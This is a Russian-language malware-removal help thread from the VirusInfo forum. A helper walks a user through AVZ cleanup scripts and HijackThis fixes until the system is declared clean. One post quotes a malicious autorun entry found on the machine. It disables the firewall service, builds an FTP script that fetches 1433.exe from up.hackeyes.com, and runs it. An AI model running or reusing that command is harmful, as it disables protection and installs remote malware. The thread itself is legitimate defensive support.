Показано с 1 по 8 из 8.

Посмотрите пожалуйста логи, (заявка № 104140)

  1. #1
    Junior Member Репутация
    Регистрация
    16.06.2011
    Сообщений
    43
    Вес репутации
    47

    Посмотрите пожалуйста логи,

    Это логи после лечения AVZ . У меня есть предположение чьто после лечения остались коекакие хвосты. Помогите пожалуйста разобратся. Да ищё в диспечере устройств новое неопознаное устройство ROOT\LEGACY_UZE4ODKX\0000
    Последний раз редактировалось olejah; 22.06.2011 в 16:18. Причина: Карантин в теме.

  2. Будь в курсе!
    Реклама на VirusInfo

    Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:

    Anti-Malware Telegram
     

  3. #2
    Cyber Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Аватар для Info_bot
    Регистрация
    11.05.2011
    Сообщений
    2,287
    Вес репутации
    378
    Уважаемый(ая) unforgiven101077, спасибо за обращение на наш форум!

    Помощь при заражении комьютера на VirusInfo.Info оказывается абсолютно бесплатно. Хелперы, в самое ближайшее время, ответят на Ваш запрос.

    Если наш сайт окажется полезен Вам и у Вас будет такая возможность - пожалуйста поддержите проект.

  4. #3
    Visiting Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    27.05.2009
    Сообщений
    2,655
    Вес репутации
    251
    Здравствуйте.
    Отключите:
    -ПК от интернета
    -Все защитные приложения
    Выполните скрипт в AVZ:
    Код:
    begin
    SearchRootkit(true, true);
    SetAVZGuardStatus(true);
    TerminateProcessByName('c:\cashwriter\cash.exe');
    QuarantineFile('c:\windows\aq.bat','');
    QuarantineFile('c:\cashwriter\cash.exe','');
    QuarantineFile('C:\WINDOWS\System32\tcpwakvlib.exe','');
    QuarantineFile('C:\WINDOWS\V2011.exe','');
    DeleteFile('c:\windows\aq.bat');
    DeleteFile('C:\WINDOWS\System32\tcpwakvlib.exe');
    RegKeyParamWrite('HKEY_LOCAL_MACHINE', 'Software\Microsoft\Command Processor', 'AutoRun', 'REG_SZ', '');
    BC_ImportAll;
    ExecuteSysClean;
    BC_DeleteSvc('WakvSvc');
    ExecuteRepair(9);
    ExecuteWizard('TSW',2,3,true);
    BC_Activate;
    RebootWindows(true);
    end.
    Компьютер перезагрузится.
    Затем выполните ещё один скрипт:
    Код:
    begin
    CreateQurantineArchive(GetAVZDirectory+'quarantine.zip');
    end.
    И пришлите quarantine.zip из папки AVZ согласно правилам (через красную ссылку "Прислать запрошенный карантин" наверху темы).
    Сделайте повторные логи.
    Сделайте лог MBAM.

  5. #4
    Junior Member Репутация
    Регистрация
    16.06.2011
    Сообщений
    43
    Вес репутации
    47
    ВЫсылаю повторные логи , проблема с ROOT\LEGACY_UZE4ODKX\0000 пока сохранилась и ищё при запуке появилось ищё какоето окно с 1433.ехе в вложеной картинке окно после перезапуска системы после выполнения скрипта AVZ

  6. #5
    Visiting Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    27.05.2009
    Сообщений
    2,655
    Вес репутации
    251
    Пофиксите в HijackThis:
    Код:
    O4 - HKLM\..\Run: [shell] c:\windows\system32\cmd.exe /c net1 stop sharedaccess&echo open up.hackeyes.com  > cmd.txt&echo 110>> cmd.txt&echo 110>> cmd.txt&echo binary >> cmd.txt&echo get 1433.exe>> cmd.txt&echo bye >> cmd.txt&ftp -s:cmd.txt&p -s:cmd.txt&1433.exe&1433.exe&del cmd.t
    Выполните скрипт в AVZ:
    Код:
    begin
    SearchRootkit(true, true);
    SetAVZGuardStatus(true);
    DeleteFile('C:\WINDOWS\V2011.exe');
    RegKeyParamDel('HKEY_USERS','.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Run','V2011');
    RegKeyParamDel('HKEY_USERS','S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Run','V2011');
    BC_ImportAll;
    ExecuteSysClean;
    ExecuteWizard('TSW',2,3,true);
    BC_Activate;
    RebootWindows(true);
    end.
    Сделайте повторные логи.

  7. #6
    Junior Member Репутация
    Регистрация
    16.06.2011
    Сообщений
    43
    Вес репутации
    47
    Вот повторные логи, осталась только проблема с новым оборудыванием

  8. #7
    Visiting Helper Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация Репутация
    Регистрация
    27.05.2009
    Сообщений
    2,655
    Вес репутации
    251
    Чисто.
    Попытайтесь удалить новое оборудование.

  9. #8
    Junior Member Репутация
    Регистрация
    16.06.2011
    Сообщений
    43
    Вес репутации
    47
    Спасибо щас попробую удалить новое оборудование

    Добавлено через 8 минут

    Большое спасибо всё работает нормально тему можно закрывать
    Последний раз редактировалось unforgiven101077; 23.06.2011 в 13:26. Причина: Добавлено

  • Уважаемый(ая) unforgiven101077, наши специалисты оказали Вам всю возможную помощь по вашему обращению.

    В целях поддержания безопасности вашего компьютера настоятельно рекомендуем:

     

     

    Чтобы всегда быть в курсе актуальных угроз в области информационной безопасности и сохранять свой компьютер защищенным, рекомендуем следить за последними новостями ИТ-сферы портала Anti-Malware.ru:

     

     

    Anti-Malware VK

     

    Anti-Malware Telegram

     

     

    Надеемся больше никогда не увидеть ваш компьютер зараженным!

     

    Если Вас не затруднит, пополните пожалуйста нашу базу безопасных файлов.

  • Похожие темы

    1. Посмотрите логи, пожалуйста
      От lazy в разделе Помогите!
      Ответов: 11
      Последнее сообщение: 26.11.2009, 20:02
    2. Посмотрите пожалуйста логи
      От Андр76 в разделе Помогите!
      Ответов: 1
      Последнее сообщение: 16.07.2009, 16:25
    3. посмотрите пожалуйста логи
      От mak83 в разделе Помогите!
      Ответов: 4
      Последнее сообщение: 14.07.2009, 20:16
    4. Посмотрите логи пожалуйста?
      От SlyAss в разделе Помогите!
      Ответов: 6
      Последнее сообщение: 10.07.2009, 14:12
    5. Посмотрите пожалуйста логи
      От pcsoft в разделе Помогите!
      Ответов: 28
      Последнее сообщение: 05.05.2008, 15:04

    Свернуть/Развернуть Ваши права в разделе

    • Вы не можете создавать новые темы
    • Вы не можете отвечать в темах
    • Вы не можете прикреплять вложения
    • Вы не можете редактировать свои сообщения
    •  
    Page generated in 0.01154 seconds with 19 queries